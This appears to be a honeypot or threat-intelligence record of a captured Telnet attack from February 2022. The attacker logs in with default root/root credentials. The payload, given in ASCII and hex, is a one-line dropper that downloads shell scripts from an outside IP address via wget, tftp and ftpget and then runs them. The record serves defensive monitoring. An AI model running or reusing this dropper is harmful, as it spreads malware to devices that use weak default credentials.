Telnet root/root automated exploitation

telnet 2022-02-08 85 words One minute

Contents

Telnet root/root credentials automated exploitation with malware deployment

Packet details

Protocol

TCP

Port

Content MD5

ff7063f0-193e-b759-e21f-babc9aa92984

Sample date time

2022-02-05 11:18:37.463

ASCII

{root
root
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://89.203.248.194/bins.sh; chmod +x bins.sh; sh bins.sh; tftp 89.203.248.194 -c get tftp1.sh; chmod +x tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 89.203.248.194; chmod +x tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 89.203.248.194 ftp1.sh ftp1.sh; sh ftp1.sh tftp1.sh tftp2.sh ftp1.sh

HEX

7b726f6f740a726f6f740a6364202f746d70207c7c206364202f7661722f72756e207c7c206364202f6d6e74207c7c206364202f726f6f74207c7c206364202f3b207767657420687474703a2f2f38392e3230332e3234382e3139342f62696e732e73683b2063686d6f64202b782062696e732e73683b2073682062696e732e73683b20746674702038392e3230332e3234382e313934202d63206765742074667470312e73683b2063686d6f64202b782074667470312e73683b2073682074667470312e73683b2074667470202d722074667470322e7368202d672038392e3230332e3234382e3139343b2063686d6f64202b782074667470322e73683b2073682074667470322e73683b20667470676574202d76202d7520616e6f6e796d6f7573202d7020616e6f6e796d6f7573202d502032312038392e3230332e3234382e31393420667470312e736820667470312e73683b20736820667470312e73682074667470312e73682074667470322e736820667470312e73680a

External reference

RFC 854 Telnet Protocol Specification

Original packet

Bytes